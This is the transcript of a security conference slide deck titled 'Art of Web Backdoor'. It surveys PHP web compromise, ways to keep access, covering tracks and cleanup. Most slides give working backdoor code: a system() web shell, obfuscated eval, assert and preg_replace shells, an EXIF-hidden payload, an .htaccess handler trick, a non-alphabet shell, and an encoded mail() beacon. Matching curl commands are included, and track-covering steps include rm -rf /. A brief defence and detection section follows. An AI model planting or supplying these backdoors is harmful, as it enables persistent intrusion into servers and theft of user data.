Art of Web Backdoor - Pichaya Morimoto
-
Upload
pichaya-morimoto -
Category
Software
-
view
589 -
download
2
description
Transcript of Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoorstealth ways to hide your ass in pwned box
[email protected]/index.htmlilinkedin.com/in/pich4ya
Pichaya Morimoto
พระราชบัญญัติ วาดวยการกระทําความผิดเกี่ยวกับคอมพิวเตอร พ.ศ. ๒๕๕๐มาตรา 5 ผูใดเขาถึงโดยมิชอบซึ่งระบบคอมพิวเตอรที่มีมาตรการปองกันการเขาถึงโดยเฉพาะและมาตรการนั้นมิไดมีไวสําหรับตน โทษจําคุกไมเกิน 6 เดือน หรือปรับไมเกิน 10,000 บาทมาตรา 7ผูใดเขาถึงโดยมิชอบซึ่งขอมูลคอมพิวเตอรที่มีมาตรการปองกันการเขาถึงโดยเฉพาะ และมาตรการนั้นมิไดมีไวสําหรับตน โทษจําคุกไมเกิน 2 ป หรือปรับไมเกิน 40,000 บาทมาตรา 9ผูใดทําใหเสียหาย ทําลาย แกไข เปลี่ยนแปลง หรือเพิ่มเติมไมวาทั้งหมดหรือ บางสวน ซึ่งขอมูลคอมพิวเตอรของผูอื่นโดยมิชอบโทษจําคุกไมเกิน 5 ป หรือปรับไมเกิน 100,000 บาท
Legal Warning
★ Anatomy of (PHP) Web Hacking★ Maintaining Access ★ Techniques★ Covering Tracks★ Case Studies★ Detect / Clean up
Overview
OWASP Top Ten 2013
A1-InjectionA2-Broken Authentication and Session ManagementA3-Cross-Site Scripting (XSS)A4-Insecure Direct Object ReferencesA5-Security MisconfigurationA6-Sensitive Data ExposureA7-Missing Function Level Access ControlA8-Cross-Site Request Forgery (CSRF)A9-Using Components with Known VulnerabilitiesA10-Unvalidated Redirects and Forwards
How we put web backdoor?
High Risk
Medium Risk
Low Risk
Public CMS/Plugins PWN
1. Vulnerability Assessment and Mapping ★ Vulnerable version ? Vulnerability exists ?★ Conditions match ? / Known limitations2. Exploitation★ Public exploit available?2.1 Yes - Just use it ★ Review & test2.2 No - Source code analysis★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/★ Issue tracker (SVN/GIT repo.)★ Public / private vulnerability discussion3. Zero-Day - for l33t h4x0r!★ Source code analysis without patch, valuable!
Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4 Fixed Date: 2013-July-31 (2.5.14, 3.1.5)
Joomla! - Unauthorised Uploads
Vulnerable files1. libraries/joomla/filesystem/file.php2. administrator/components/com_media/helpers/media.php
Scenario1. Joomla! <= 2.5.132. User with author privilege3. OS = Windows Machineor misconfigured Apache + Linux
Bypassing File Upload Restrictions in Joomla!
Known Issues or Limitations
Backdoor is a Feature for Admin!
Also in IPB, SMF, vBulletin
Latest vBulletin 5.0.4 - PHP Module
http://www.ubuntuforums.org/ ★ Hacked on 14 July 2013, Defaced on 20 July 2013★ 1.82 million users’ data leaked★ Attacker had full access on Forums app servers★ Servers running latest version of vBulletin
Case Study - Official Ubuntu Forums
What happened (posted in Canonical Blog)
● A moderator account was hacked● Attacker post XSS to forum and sent to admin ● 31 seconds .. admin account was PWNED
Invision Power Board <= 3.4.4Released on : 2013/05/13 by @johnjeanLogical Vulnerability + Bad Sanitization
1. Create new user using [email protected]+[150 spaces]+A
2. MySQL Limitation!string exceeding 150 characters are truncatedand value will be trim to cause arbitrary userhave same email as admin and change admin pass!
IPB - Bad Sanitization
3rd party components★ uploadify, ckeditor, ckfinder, tinymce, openx
Shared Hosting Security★ Exposed Session Data★ Improper user privileges(OS/Code execution, critical file manipulation)★ Vulnerable services (SSH, FTP etc.)
MITM, Insider attack, lack of physical access control etc.
Other factors
Add arbitrary accounts (*nix shadow, AD etc.)Reverse Shell and/or Bind Shell using ...
★ Binary/Script Backdoor 1. Bind Port to *nix shell2. Send *nix shell back to attacker3. Make a relay tunnel4. Hidden trigger to spawn shell
★ Web Backdoor - Use less privileged!Connect via HTTP Methods & Headers (GET/POST etc.)
Maintaining Access
<?php
if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die();}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
$ curl -d “cat+/etc/passwd” http://target.com/simple-backdoor.php
Simple PHP Backdoor
Hide your ASS
Passing variables to PHP global vars:
$_GET$_POST$_COOKIE$_REQUEST$_SERVER[‘HTTP_CMD’]
Communication
$ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system('uname -a;ps -aux');"
1. Encode (Attacker Client)$ php -r "echo base64_encode(gzdeflate('system(\"id\")'));"K64sLknN1VDKTFHSBAA=
2. Send (Attacker Client)$ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA="
3. Decode (PHP Backdoor)
@eval(gzinflate(base64_decode($_POST[“cmd”])));
4. Outputuid=33(www-data) gid=33(www-data) groups=33(www-data)
base64_decode() + gzinflate()
1. assert()
assert('sys' . 'tem('.$_POST["cmd"].')');
$ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'"
2. preg_replace() with -e modifier (deprecated in PHP 5.5.0)
preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' );
$ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp"
3. And many more, e.g. OS command executions , check out this link!http://stackoverflow.com/questions/3115559/exploitable-php-functions
Code Evaluation besides eval()
★ GNU license in beginning of a PHP file!
/* Copyright (C) 1991 Free Software Foundation, Inc.This file is part of the GNU C Library.… */ <?php ...
★ PGP Public Key !?
/* -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.10 (GNU/Linux) ... */ <?php …
★ Software license PROHIBIT to decode
Stupid trick! but it’s work!
★ More creative filename!
○ lndex.php○ 1ndex.php○ index2.php○ wp-manual.php○ cat.jpg.php○ license.txt ○ README.md○ .bash_profile
1. Create exif meta-data using exiftool
$ exiftool 2600.jpg -Software=system$ exiftool 2600.jpg -Model=id
2. Put 2600.jpg along with backdoor
$A = exif_read_data('2600.jpg');$A['Software']($A['Model']);
3. Browse to backdoor and boom!uid=33(www-data) gid=33(www-data) groups=33(www-data)
PHP: exif_read_data()
1. Apache Configuration
AllowOverride All
2. .htaccess
<FilesMatch "2600.jpg">SetHandler application/x-httpd-php</FilesMatch>
3. 2600.jpg<?php @system($_POST["cmd"]); ?>
.htaccess + any file format
<?@$_POST[0]($_POST[1])?>$ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"
one statement PHP backdoor
Binary Code in PHP Shell
Binary Code in PHP Shell
<?$_="";$_[+""]='';$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
$ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a"
*** This code contains non-printable characters, it might not work if you copy & paste! ***
non-alphabet PHP shell
work for various type of OS (win/linux/osx ) and ISO ??find writable directoryread/write filemerge into every filesmerge into backup db / files / zipreverse/bind php shelldatabase clientFile management (symlink?)av/ids/ips/waf detect credential dumperos commandnetwork scannerTCP/UDP/HTTP/DNS Amp flood SOCKS Proxy for pivotingHTTP proxy, IRC connect backetc.
Common survivor feature!
Exploit Pack
c99r57wsoicfdkshellweevelyASPshmsfpayload use at your own risk!
Free Kiddies Backdoor!
Caution!There are many cases that backdoor served inside another backdoor *w*)ae.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.zip
$x10="\x6dai\154";$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];$x0c="\141r\162a\171\040".$x0b;$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
Decoded:
mail(“[email protected]”,”target/backdoor.php”,”target/backdoor.php”);
★ root?★ logs e.g. /var/log/*★ history e.g. ~/.bash_history★ self-destruction★ rm -rf /
Covering Tracks
★ Follow secure coding guideline★ Security hardening checklists★ Critical File Integrity Monitoring★ VA / Pentest by certified guys★ Patch Management & Patch Auditing★ Centralized Log & WAF?
$ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP
Detect / Prevent
var_dump(in_array('mod_security2', apache_get_modules ()));print_r(apache_get_modules());
MOD_Security ?
1. Change/reset passwords2. Review log files3. Hunting vulnerable apps/backdoors4. Backup || Recovery
$ grep - common danger functions$ find ★ newly created files ★ certain conditions (time/date/permission)
Clean up
Capture The Flaghttps://ctftime.org/Online challengeshttp://www.root-me.org/en/Challenges/http://wargame2k10.nuitduhack.com/http://captf.com/practice-ctf/http://www.overthewire.org/wargames/natas/http://www.modsecurity.org/demo/
VM Labshttp://blog.g0tmi1k.com/2011/03/vulnerable-by-design.htmlhttps://pentesterlab.com/exercises/http://vulnhub.com/
Practical Hacking?
Thanks You !